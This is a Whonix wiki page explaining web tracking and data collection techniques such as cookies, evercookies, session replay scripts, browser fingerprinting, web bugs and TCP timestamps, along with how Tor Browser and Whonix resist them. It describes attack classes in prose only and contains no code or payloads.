Jump to: navigation, search

Data Collection Techniques

About this Data Collection Techniques Page
Support Status stable
Difficulty easy
Maintainer torjunkie
Support Support

Data Collection Techniques[edit]

Some of the techniques employed by data miners on the Internet are briefly introduced below.

Cookies[edit]

Introduction[edit]

Cookies have been in existence since 1994, when they were conceived by a programmer working for Netscape Communications as a reliable method for e-commerce applications. According to Wikipedia: [1]

An HTTP cookie (also called web cookie, Internet cookie, browser cookie, or simply cookie) is a small piece of data sent from a website and stored on the user's computer by the user's web browser while the user is browsing. Cookies were designed to be a reliable mechanism for websites to remember stateful information (such as items added in the shopping cart in an online store) or to record the user's browsing activity (including clicking particular buttons, logging in, or recording which pages were visited in the past). They can also be used to remember arbitrary pieces of information that the user previously entered into form fields such as names, addresses, passwords, and credit card numbers.

Cookie Classification[edit]

Whonix users are probably most familiar with third-party cookies since they can be used to track browsing history via web page content sourced from external websites, such as banner advertisements. However, cookies have a range of both useful and potentially harmful applications: [2]

  • Authentication cookies: Used by web servers to know whether a user is logged in, and the account being used.
  • Session cookies: Exist temporarily in memory while a website is navigated and are normally deleted when the browser is closed.
  • Persistent cookies: Expire after a specific period of time, or on a set date. They transmit information to servers every time a user browses websites that are associated with the cookie. Persistent cookies can track a user's browsing habits over an extended period, possibly years. [3]
  • Secure cookies: Transmitted over encrypted (HTTPS) connections, making them less vulnerable to cookie theft.
  • Third-party cookies: Belong to domains that are different from the URL shown in the web browser address bar. Tracking is enabled via the following process:
    • Website A contains an advertisement served by eviladvertiser.org
    • A cookie belonging to eviladvertiser.org is downloaded and stored on the user's computer.
    • Website B is visited and also contains advertising content from eviladvertiser.org, setting another cookie belonging to that domain.
    • Both cookies are eventually sent to eviladvertiser.org, and an extensive profile of browsing history is gradually acquired over time.
  • Supercookies: Have an origin of a top-level domain like .org or a public suffix such as .com.de. If not blocked by the browser, adversaries in control of malicious websites can set supercookies and then impersonate or disrupt user requests to another website sharing the same top-level domain or public suffix.

Evercookies[edit]

With 80% of users disapproving of tracking while browsing the Internet, they have progressively started to delete cookies with relevant browser settings and extensions. Advertisement and tracking networks have responded in kind, using more sophisticated methods - evercookies - to distinguish users.

Evercookies come in various forms:

  • Entity tag (ETag) cookies: HTTP supports simple cache control mechanisms, including ETags which store either a version number or a user identifier (ETag cookie). The purpose is to save bandwidth and have browsers use caches for web content when it has not changed, instead of reloading the complete web server content again. [4] Unfortunately this provides a tracking mechanism which can be persistently stored, and has been used by various websites including Hulu.com. ETag cookies can be, and often are respawned. [5]
  • Zombie cookies: Automatically recreated after being deleted. Cookie content is stored in multiple locations such as HTML5 web storage, Flash Local shared object, client-side and server-side locations. When the cookie is deleted on a user's computer, this is detected and restored from one of the other cookie storage locations.
  • Flash cookies (LSOs): Flash cookies are also known as local shared objects (LSOs) and store data from websites that use Adobe Flash. User permission is not sought when cookies are stored, and they are stored outside of normal browser local storage system. [6] Previously, it was difficult to delete Flash cookies, as they could not be located easily with browsers. [7] However, modern browsers, extensions and software have relevant settings to easily remove them. [8] LSOs can be used to: [9]
    • Store and retrieve information from local storage when a user access webpages with a Flash application.
    • Store user preferencs.
    • Save data from Flash games.
    • Track users' Internet activity, even across different browsers. For example:
      • Firefox is used to visit a site showing a relevant product.
      • Firefox is closed, but that information was stored in a LSO.
      • The same person on the same machine uses Chrome to access a website viewed in Firefox.
      • The website is able to read the LSO value(s) in Chrome, and display relevant content or targeted information.
  • HTML5 DOM cookies: Allow web application software to store data persistently in a manner similar to cookies. Local storage and session-only storage are both possible. The storage size is far greater than that available to cookies, but it is not automatically transmitted on every HTTP request. Instead, client-side scripts allow the desired interaction with the server. It is possible to remove DOM cookies without about:config changes in Firefox [10], by using relevant extensions (like Click&Clean or BetterPrivacy), or by waiting for Firefox 58 which will disable them by default. Tor Browser defends against this by default. [11]
  • Samy Kamkar has shown that there are other possible methods to track Internet users using evercookies.


In a study by the University of California, Berkeley the methods of Space Pencil Inc. (aka KISSmetrics) were exposed. In addition to cookies and flash cookies, KISSmetrics used cache cookies via ETags, DOMStorage and IE-userData to distinguish each user. KISSmetrics was sued as a result and dispensed with using ETags. It also allegedly now respects the Do Not Track HTTP header. [12]

Tor Browser, which comes with Whonix, resists evercookies.

Cookie Threats[edit]


It is evident that cookies are useful for website personalization, logins, monitoring purchases and other functions, but they also present a dire tracking threat. The average website places 34 cookies on a device on the first visit, and 70 percent of these are third-party cookies. Expiry dates are often set to the year "9999", indicating there is no intention to ever stop recording user behavior. [14]

The tracking service Yahoo! Web Analytics has made claims of being able to set cookies on 99.9% of users. This indicates that cookie-generating JavaScript and/or Flash cookies are deployed as the primary mechanisms.

A 2011 study by the University of California, Berkeley found that the top 100 websites at that time stored a total of 5,675 cookies. Of these, 4,914 cookies were set by third party domains and not the first-party domain being purposefully visited by the user. When browsing these 100 websites, data was transmitted to 600 servers.

Cookie security is dependent on whether cookie data is encrypted, since adversaries may otherwise use this information to gain access to user data or to access websites with the user's credentials. Examples of this attack include cross-site scripting and cross-site request forgery.

As well as gathering the IP address and/or the HTTP referrer field of the computer requesting the web page, cookies can also store the requested URL and the date/time of the request. Web hosts are therefore capable of recording a large proportion of browsing behavior over many years, and correlating the accumulated profile data with individuals. The typical Internet user has collected hundreds of cookies from various websites on their PC without their knowledge. For instance, the following figure exhibits a small number of the cookies that are stored when a request is made to www.nytimes.com.

Figure: Cookies set by the New York Times

Cookies nytimes.png


Most modern browsers integrate an optional function to block cookies, but the option has to be first set by the user. Tor Browser, which comes bundled with Whonix, has activated cookie blocking by default. Firefox has also adopted Tor Browser's first party isolation feature since version 55, meaning cookies are separated on a per-domain basis. Advertisement trackers are unable to see all the cookies stored on a user's computer (only the cookie for the currently viewed domain), meaning they cannot aggregate persistent cookie data for profiling. In the future, it is expected that more functions will become available to administrate preferences and acquired cookie collections.

Active Web Contents[edit]

Web content that is accessible by browser plugins such as Flash, Java, ActiveX and Silverlight renders the Web more dynamic and colorful. However, permissions are also granted to websites to execute code locally on a machine, increasing the security risks. If executed, these plugins can read a host of details about the user's computer and network configuration and send it to a remote server. Certain techniques even permit files to be read and edited on the user's machine, and in extreme cases this allows complete control over it.


Limiting browsing to trusted websites does not mitigate the risk from applets. In the recent past, numerous popular websites have been hacked and infected with malicious code. Greater security requires these plugins to be blocked, deactivated or removed.

In Whonix, an adversary will not benefit from learning the IP address via this method: it is either a local IP address shared among all Whonix users or the IP address of a Tor exit relay, both of which do not reduce the user's anonymity set. Further, the MAC address is a virtual one which is also shared among all Whonix users, and is therefore worthless to attackers. Although active content will not reveal the real IP address, it is deactivated in Tor Browser by default. See Browser Plugins for a detailed discussion of browser plugins in Whonix and the potential effects on anonymity, security, and privacy.

JavaScript[edit]

Introduction[edit]

JavaScript is one of the fundamental core technologies for Internet content production, alongside HTML and CSS. It allows sites to be interactive and dynamic, as well as provide for online applications such as video games. In contrast, HTML is a markup language that is used to create static content on sites, and Cascading Style Sheets (CSS) are designed for user formatting like interfaces, layout, colors and fonts. Modern browsers frequently use JavaScript ("scripts", "active scripting") and it is marginally safer against security and privacy vulnerabilities compared to the aforementioned plugins.

In the past, JavaScript has been responsible for an estimated 84% of all security vulnerabilities on the Internet via cross-site scripting. This attack allows adversaries to inject malicious client-side script into web pages, leading to users redirecting to malicious sites that phish for login credentials, bank accounts, personal information, or other sensitive data. [16] Similarly, JavaScript can be used by web hosts to access detailed information about a user's browser, desktop setting, operating system and hardware specifications, which forms a unique digital fingerprint of an individual. [17] [18]

JavaScript Attack Classification[edit]

JavaScript is essential to a fully functional browsing experience, but several classes of attacks rely upon it and are often successful: [19] [20] [21]

  • Malicious JavaScript email attachments: When a harmless looking document is opened by the user, ransomware is downloaded to the HDD/SSD, later encrypting the computer and demanding a ransom to unlock the files.
  • Drive-by download attacks: When users visit a compromised website running malicious code, [22] users are redirected to another site controlled by the attackers. Attackers then run code in the victim's web browser that loads an exploit kit which probes the user's OS, browser and software to find vulnerabilities. Payloads/malware are then downloaded that access personal data, encrypt the computer or other intended criminal activity.
  • Cross-site scripting: Since the 1990s it has been possible to inject JavaScript client-side into web-based applications, servers or plug-in systems, bypassing the same-origin policy. After successful exploitation, users visiting the compromised site are served malicious content which is presumed to be from a trusted source. Attackers can then access sensitive page content, session cookies and other information.
  • Universal cross-site scripting: Vulnerabilities in the browser or plugins are exploited to take control over the network. For example Firefox and other browsers, as well as plugins like Flash and ActiveX controls, all have flaws which can lead to buffer overflows. These are often exploitable via JavaScript and allows attackers to gain access to to OS's Application Programming Interface (API) with root privileges. [23]
  • Cross-site request forgery: Unauthorized commands are transmitted from a user by trusted web applications. Malicious websites can use specially crafted image tags, hidden forms, and JavaScript XMLHttpRequests for this purpose. Depending on the specific vulnerability, when these elements are clicked by the user, the attacker may be able to:
    • Execute remote code with root privileges.
    • Forge login requests and view private information.
    • Change personal information or fully compromise online accounts.
    • Conduct illicit money transfers.
    • Performance nearly all actions of a logged in user.

Session Replay Scripts[edit]

Enabling Javascript does more than reveal additional information about a user's system and increase the probability of a successful browser exploit. It can also lead to a complete, literal recording of the entire browsing session if the user is unlucky enough to browse one of nearly 500 sites in the Alexa top 50,000: [24] [25]

You may know that most websites have third-party analytics scripts that record which pages you visit and the searches you make. But lately, more and more sites use “session replay” scripts. These scripts record your keystrokes, mouse movements, and scrolling behavior, along with the entire contents of the pages you visit, and send them to third-party servers. Unlike typical analytics services that provide aggregate statistics, these scripts are intended for the recording and playback of individual browsing sessions, as if someone is looking over your shoulder.

The law as it stands allows corporate entities to embed Javascript functions on sites in order to record highly personal information. This includes what is typed, exact movements of the mouse, and even "co-browsing", whereby an unseen intruder can watch what it is done in real time, without any form of notification. There are few limits to the data harvested; name, email, phone number, address, social security numbers and date of birth are all considered fair game by companies like FullStory, Hotjar, and Smartlook. Many offer the option to explicitly link recordings to real identities.

Although full or part redactions are attempted on passwords, credit card numbers, CVC numbers, and credit card expiry dates, sensitive information was found to leak in many instances, such as: [26]

  • Passwords entered into registration forms.
  • Leaking of credit card details on payment pages, even in real time.
  • Leaking of specific medical conditions and prescriptions.


The same tracking companies often use insecure HTTP pages to deliver the recording playbacks or publisher page contents, providing an enticing man-in-the-middle attack opportunity for advanced adversaries. [27] Fortunately, disabling Javascript is sufficient to prevent this activity completely, and ad-blocking lists are also useful in preventing data exfiltration. [28] Users should not solely rely on ad-blockers for general tracking protection, as tools have already been developed which successfully defeat the most popular extensions, including Adblock Plus, Adblocker Ultimate, Ghostery and uBlock Origin.

Conclusion[edit]

Enabling or Disabling JavaScript[edit]

JavaScript is a clear and present danger for a host of attack vectors, however, there is a security versus privacy trade-off to consider before disabling JavaScript completely: [29]

The take-home message is disabling all JavaScript with white-list based, pre-emptive script-blocking may better protect against vulnerabilities (many attacks are based on scripting), but it reduces usability on many sites and acts as a fingerprinting mechanism based on the select sites where it is enabled. On the other hand, allowing JavaScript by default increases usability and the risk of exploitation, but the user also has a fingerprint more in common with the larger pool of users.

Safest Browser Against Exploitation[edit]

It is clearly unwise to browse the Internet without a well secured browser, otherwise there is a danger of a browser exploit leading to an infected system. Personally configuring a browser to be secure is an enormous effort requiring expertise and significant trial and error. The safer path is to use Tor Browser, preferably on a Whonix platform, since it is already hardened against data leakage. As noted in the Tor Browser chapter:

Tor Browser is a fork of the Mozilla Firefox web browser. It is developed by The Tor Project and optimized and designed for Tor, anonymity and security.

...

Features like proxy obedience, state separation, network isolation, anonymity set preservation and a host of others are simply unsupported by other browsers.

In stark contrast to regular browsers, Tor Browser is optimized for anonymity and has a plethora of privacy-enhancing patches and add-ons. With Tor Browser, the user "blends in" and shares the Fingerprint of nearly three million other users, which is advantageous for privacy.


Tor Browser blocks most dangerous technologies by default, but most popular websites like Youtube will still resolve correctly. For media portals which rely on Flash or alternative plugins, the user can download the relevant files with special software and then view it with an open source media player like VLC. Websites should be avoided if they insist on the use of active plugins, see Browser Plugins.

Browser Fingerprinting[edit]

Research from a pool of 500,000 Internet users has shown that the vast majority (84%) have unique browser configurations and version information which makes them trackable across the Internet. When Java or Flash is installed, this figures rises to 94%. [30] Considering this research relied only on a relatively small number of variables, [31] companies with advanced fingerprinting capabilities may be approaching 100%, particularly in combination with cookies.

Fingerprinting and Anonymity[edit]


For anonymity, it is necessary to reduce the number of bits of information (entropy) the browser provides to an acceptable lower bound; for instance, 18.1 bits of entropy means that a browser chosen at random will share the fingerprint with one in 286,777 other browsers. [33] Browser uniqueness research has revealed the entropy associated with various pieces of browser information: [34]

Variable Entropy (bits)
Plugins 15.4
Fonts 13.9
User agent 10.0
HTTP accept 6.09
Screen resolution 4.83
Time zone 3.04
Supercookies 2.12
Cookies enabled 0.353

The primary browser fingerprinting methods that are used include: [35] [36]

  • Plugins: The PluginDirect JavaScript library checks for common plugins on the respective platform, and code is run to check for the Acrobat Reader version. Other information may be leaked, including the CPU type.
  • Fonts: System fonts are collected by Flash or Java applets, or by CSS introspection.
  • User Agent string: When websites are visited, the browser sends precise information on the operating system and web browser being used. [37]
  • HTTP Accept headers: With every webpage request, the browser sends information within the HTTP protocol framework that can be analyzed. This includes language, browser type and version, operating system and version, supported character sets, files codecs, and the last visited webpage.
  • Screen resolution: The exact resolution is revealed to websites, for example 1280x800x24. [38]
  • Supercookies: Reported entropy depends on whether the following are enabled: DOM localStorage, DOM sessionStorage, userData, Flash LSOs, Silverlight cookies, HTML5 databases, or DOM globalStorage.
  • Clock skew/precision measurements: Differential parameters are used to measure the time difference (down to milliseconds) between a user's computer and that of the server. Clock precision measurements rely upon how long operations take on a partricular system.
  • HTML5 canvas: A precise fingerprint is provided by the rendering of WebGL, font and color data to a canvas element. This is then extracted from the image buffer, and an identifying hash is computed. For more information, see here.

Fingerprinting Resistance[edit]

The EFF has found that while most browsers are uniquely fingerprintable, resistance is afforded via four methods:

  • Disabling JavaScript with tools like NoScript.
  • Use of Torbutton, which is bundled with Tor Browser and enabled by default. [39]
  • Use of mobile devices like Android and iPhone.
  • Corporate desktop machines which are clones of one another.


With JavaScript disabled, Tor Browser provides significant resistance to browser fingerprinting: [40]

  • The User Agent is uniform for all Torbutton users.
  • Plugins are blocked.
  • The screen resolution is rounded down to 50 pixel multiples.
  • The timezone is set to GMT.
  • DOM Storage is cleared and disabled.


At the time of writing, Panopticlick only returns 6.63 bits of information for Tor Browser with JavaScript disabled. This is equivalent to sharing the same fingerprint as 1 in 99 other browsers due to the 3 million strong pool of near-identical users. That said, fingerprinting defense is not perfect in any browser and there are still open bugs, see TBB-linkability and TBB-fingerprinting.

Browser History and Cache[edit]

A publication from the University of California provides an analysis of the top 50,000 websites. 1% of these websites collect information about web surfers via history sniffing. Using malicious JavaScript code and CSS hacks, information about previously visited websites were collected. Webmasters who are not familiar with sniffing technologies can use services like Tealium or Beencounter for real-time history sniffing.

Collected information is not only used for advertisements. It can be used for de-anonymization of surfers too. A publication from Isec shows one possible way. Using the browser history the visited groups of the social network site Xing were collected. Because there are generally no two people who are members of the exact same set of groups in a social network, it was possible to get the real names and e-mail addresses of the users.

By certain trickery, websites can tell which websites are saved in your browser history. For this, the visited website embeds special formatting commands (CSS Stylesheets) that contain external links "of interest" on the pages you visit. If you have visited one of the external websites before, your browser will react by executing a command defined in the format, e.g. download a small picture from the website. The website can thereby largely guess the contents of your browser history.

From the contents of your browser cache one can conclude already cached, thus previously visited, websites. Together with every website an ETag is sent by the server and stored in the browser cache. If the website was called again, the Etag is sent first to ask for changes. This tag may contain a unique user ID. KISSmetrics was using ETags in this way to identify visitors of some TOP100 websites.

Additionally, the time required for loading a website changes when part of it is already in the browser cache. By subtle placement of the images on the website, the server can analyze the cache one by one.

At the moment, there is no reliable protection against the analysis of browser histories apart from deactivating this feature, which has been made the default in Tor Browser.

Unlike deactivating your browser history, deactivating your cache would have tremendous effect on your surfing speed, which is why we don't recommend it. In Tor Browser a protective mechanism has been integrated instead which bypasses the cache for third party content. Also, the cache is deleted automatically when you close the browser. A website can thus only gain information about itself, not about other websites.

Webbugs and Banner Ads[edit]

Very likely, you will find one or more #cookies in your browser from data miners such as doubleclick.com, advertisement.com or Google, although you may have never even visited their websites. This is due to the fact that these enterprises use, on other web sites, a simple trick to nevertheless plant cookies in your browser and watch your browsing: Webbugs.

"Webbugs" are usually pictures of 1 pixel by 1 pixel which are therefore invisible to the viewer. However, they can also be coded into banner ads embedded in a website. The website contains a picture (webbug) that is loaded from another server running a statistics service (such as Doubleclick or Google Analytics). Thereby the statistics service may set or edit a cookie in your browser unnoticeably. The browser will then send this cookie back to the statistics service with every new request for a site where any webbug of this service is embedded. If the service is used on many different websites, it can now track large parts of your browsing session. If the owner of the statistics service moreover collaborates with the owner of your preferred search engine, he gets an almost complete picture of your Internet activities.

The privacy functions of most current browsers of simply rejecting cookies and/or deleting them upon browser shutdown do not achieve optimal protection from web bugs.

Another nasty feature of webbugs is, that they send, besides cookies, also your #IP address to the statistics service upon request. Even with a very good browser configuration, including switching off cookies and using webbug filters, you are never able to reliably prevent this. The only effective methods of protection against this are anonymization services like Tor.

TCP Timestamps[edit]

The Transmission Control Protocol (TCP) is a session-layer protocol for transferring data between computers. It is necessary for using Internet protocols like http (WWW), smtp (E-Mail) and ftp. When your computer sends a request for a web site, for example, this data is sent within many small TCP packets. Besides that request data, a TCP packet also contains some optional information fields in the header (metadata). One of those optional fields is the TCP timestamp. The value of this timestamp is proportional to the current time of your computer and is incremented according to your computer's internal clock.

The timestamp may be used by the client and/or server machine for performance metrics and optimization. However, an Internet server may recognize and track your computer by observing those timestamps: By measuring the clock skew of the timestamps, it may calculate an individual clock skew profile for your computer. Moreover, it may estimate the time when your machine was last booted. These tricks work even if you have otherwise perfectly anonymised your Internet connections.

If you are using Whonix, however, you are protected against being observed this way. The clock in Whonix-Workstation does not match your clock on the host and the clock in Whonix-Workstation is set securely by sdwdate over https, which will result in slightly different results compared to using the more accurate NTP.

If you are using Tor, you are also being protected against being profiled in another way: The Tor relays automatically replace your potentially insecure TCP packets with their own.

source 1: Tor trac #8169 replace TCP timestamp source 2: Tor wiki FAQ

IP Address[edit]

The IP address is given to you by your provider on dialing into the Internet. The provider usually saves it for months or even years together with your customer data and your online time. It is your distinct identifier on the Internet which is sent along whenever you make a direct connection to any Internet service. The IP address tells the server where to send his response. As long as your IP does not change, it is easy to monitor when and what website you have contacted. The IP also reveals your provider, your location (many times) and sometimes (in case of a company or computer center) even what terminal you are on. In many cases, an IP address relates directly to one person.

All that your IP-address is revealing:

  • Your current whereabouts

The country and the city/region where you are. With the help of databases free of charge or with costs even districts and office buildings can be identified. This is called geolocation.

  • Your Internet-provider

Personal data can be retrieved using your provider.

  • Your access technology

With the help of databases one can find out whether you are using, for instance, DSL, a modem or a mobile device to surf the Web.

  • Your company / your authority

In the case where you are surfing from within the network of a company or an authority, its name can be found out.

Some of the information that is given away by your IP or browser can be reviewed on ip-check.info.

While the traces mentioned so far can be blurred without any special services needed, the same cannot be said about your IP address. That is why Tor has been developed: In order to blur any connection between your IP and the websites you visit. Whonix connects to the service Tor network. How Tor works

MAC Address[edit]

The Media Access Control (MAC) address is the hardware address of each individual network device. It is sometimes referred to as the Ethernet-ID, Airport-ID, or physical / hardware / adapter address. Standard computer systems may have several physical or virtual network devices. These devices can be bound to a cable (LAN), wireless (WLAN), mobile (GPRS, UMTS) or virtual (VPS) environment, or another setup.


The MAC address serves as a unique identifier for the respective device in a local area network. Unless the computer is infected with malware designed to disclose this identifier, it is neither used nor transmitted on the Internet. Also, an access provider can only see the MAC address if the computer is connected directly to the Internet (for example by a modem), rather than over a router.

Despite the limited risk of disclosure, MAC addresses can be used for tracking purposes by adversaries. For instance, other computers on the local network can potentially log it, which would then provide proof that the user's computer has been connected to a specific network. Moreover, advanced tracking techniques exist that are able to enumerate the MAC address of a Wi-Fi card in use, by examining its physical characteristics. For these reasons MAC spoofing should be considered for particular circumstances, like when an untrusted, public network will be used. See the MAC address entry for further information.

HTML5 Canvas Image Data[edit]

Websites routinely request browser configuration settings in order to help select the best page format for the visitor. One of those variables is HTML5 canvas image data, which is related to graphical rendering. Canvas is a drawable region in HTML code with height and width attributes, and Javascript code can access this area though a large set of drawing functions related to animation, games, images and so on.[43]

When combined with other exposed browser settings this can be enough to uniquely identify an individual, even without access to the specific IP address. [44]

The Tor Project provides a good explanation of this fingerprinting method: [45]

After plugins and plugin-provided information, we believe that the HTML5 Canvas is the single largest fingerprinting threat browsers face today. Studies show that the Canvas can provide an easy-access fingerprinting target: The adversary simply renders WebGL, font, and named color data to a Canvas element, extracts the image buffer, and computes a hash of that image data. Subtle differences in the video card, font packs, and even font and graphics library versions allow the adversary to produce a stable, simple, high-entropy fingerprint of a computer. In fact, the hash of the rendered image can be used almost identically to a tracking cookie by the web server.

Tor Browser has been patched to prompt before returning valid image data to the Canvas APIs. By default, if the site has not been given previous permission to extract canvas image data, then white image data is returned to the Javscript APIs. Third parties are not allowed to extract canvas image data at all.

When browsing, if a prompt appears with a message like that below, it is recommended to select n.

This website (github.com) attempted to extract HTML5 canvas image data, which may be used to uniquely identify your computer.

Should Tor browser allow this website to extract HTML5 canvas image data? 

License[edit]

Gratitude is expressed to JonDos for permission to use material from their website. (w) (w) [46] The DataCollectionTechniques page contains content from the JonDonym documentation DataCollectionTechniques page.

Footnotes[edit]

  1. https://en.wikipedia.org/wiki/HTTP_cookie
  2. https://en.wikipedia.org/wiki/HTTP_cookie
  3. They also have legitimate functions such as keeping users logged into specific accounts.
  4. https://en.wikipedia.org/wiki/HTTP_ETag
  5. http://cyberlaw.stanford.edu/blog/2011/08/tracking-trackers-microsoft-advertising
  6. http://www.popularmechanics.com/technology/security/how-to/a6134/what-are-flash-cookies-and-how-can-you-stop-them/
  7. https://www.ghacks.net/2007/05/04/flash-cookies-explained/
  8. In Linux, LSOs are normally stored in:
    • ~/.macromedia/Flash_Player/#SharedObjects/
    • ~/.macromedia/Flash_Player/macromedia.com/support/flashplayer/sys/
  9. https://en.wikipedia.org/wiki/Flash_cookies
  10. Set dom.storage.enabled to false.
  11. https://nakedsecurity.sophos.com/2017/10/30/firefox-takes-a-bite-out-of-the-canvas-super-cookie/
  12. Users should never relay on DNT preferences, since they are rarely respected by industry.
  13. https://www.digitaltrends.com/computing/history-of-cookies-and-effect-on-privacy/
  14. https://www.digitaltrends.com/computing/history-of-cookies-and-effect-on-privacy/
  15. In short, JavaScript is not part of the Java platform and is a scripting language, while Java is an object-oriented programming language. The Java plugin is bundled with Java runtime and runs inside the browser; allowing Java code to run inside a client's browser process.
  16. https://gizmodo.com/why-are-javascript-attacks-so-dangerous-1453269240
  17. Refer to the following ip-check.info anonymity test to view some sample values which can be gathered via JavaScript (if enabled).
  18. ip-check.info returns some false values and confuses TBB users (w)
  19. https://www.sophos.com/en-us/security-news-trends/security-trends/malicious-javascript.aspx
  20. http://worldcomp-proceedings.com/proc/p2016/SAM9734.pdf
  21. https://en.wikipedia.org/wiki/Cross-site_scripting#Related_vulnerabilities
  22. 82% of malicious sites are hacked legitimate ones
  23. Sandbox implementation errors can also lead to Javascript running outside of the sandbox and with elevated privileges e.g. create or delete files.
  24. https://freedom-to-tinker.com/2017/11/15/no-boundaries-exfiltration-of-personal-data-by-session-replay-scripts/
  25. This includes the usual privacy offenders such as microsoft.com, skype.com and adobe.com, along with various sites providing banking, media, torrenting, educational, telecommunications, forums, shopping, and anti-virus services.
  26. https://freedom-to-tinker.com/2017/11/15/no-boundaries-exfiltration-of-personal-data-by-session-replay-scripts/
  27. Reinforcing the perception that the private sector really is a comfortable and principal ally in the surveillance-industrial complex.
  28. For instance, the EasyList and EasyPrivacy blocking lists that are available in popular extensions. However, they did not block all the major companies at the time of writing.
  29. See also Tor Browser disabling JavaScript anonymity set reduction.
  30. https://www.eff.org/deeplinks/2010/05/every-browser-unique-results-fom-panopticlick
  31. Supercookie test, hash of canvas fingerprint, screen size and color depth, browser plugin details, time zone, DNT header enabled, HTTP_Accept headers, has of WebGL fingerprint, language, system fonts, platform, user agent, touch support, cookies enabled.
  32. https://33bits.wordpress.com/about/
  33. https://wiki.mozilla.org/Fingerprinting
  34. https://panopticlick.eff.org/browser-uniqueness.pdf
  35. Many require active JavaScript code.
  36. https://wiki.mozilla.org/Fingerprinting
  37. Research suggests this is useful for profiling and tracking Internet users, as it reveals 10.5 bits of identifying information on average. This means only one person in 1,500 shares the same User Agent.
  38. In Tor Browser, Torbutton reduces the available entropy by quantising AvailWidth and AvailHeight, and setting the actual Width and Height to the values of AvailWidth and AvailHeight.
  39. Torbutton automatically disables many types of active content.
  40. https://blog.torproject.org/effs-panopticlick-and-torbutton
  41. Privoxy manipulates cookies and modifies web page data and HTTP headers before the page is rendered.
  42. http://accc.uic.edu/answer/what-my-ip-address-mac-address
  43. https://en.wikipedia.org/wiki/Canvas_element
  44. https://tor.stackexchange.com/questions/4029/html-5-canvas-imagedata-extraction-what-does-it-actually-mean
  45. https://www.torproject.org/projects/torbrowser/design/
  46. Broken link: https://anonymous-proxy-servers.net/forum/viewtopic.php?p=31220#p31220

Random News:

Please contribute by helping to answer Whonix questions.


https | (forcing) onion

Share: Twitter | Facebook

This is a wiki. Want to improve this page? Help is welcome and volunteer contributions are happily considered! See Conditions for Contributions to Whonix, then Edit! IP addresses are scrubbed, but editing over Tor is recommended. Edits are held for moderation.

Whonix is a licensee of the Open Invention Network. Unless otherwise noted, the content of this page is copyrighted and licensed under the same Libre Software license as Whonix itself. (Why?)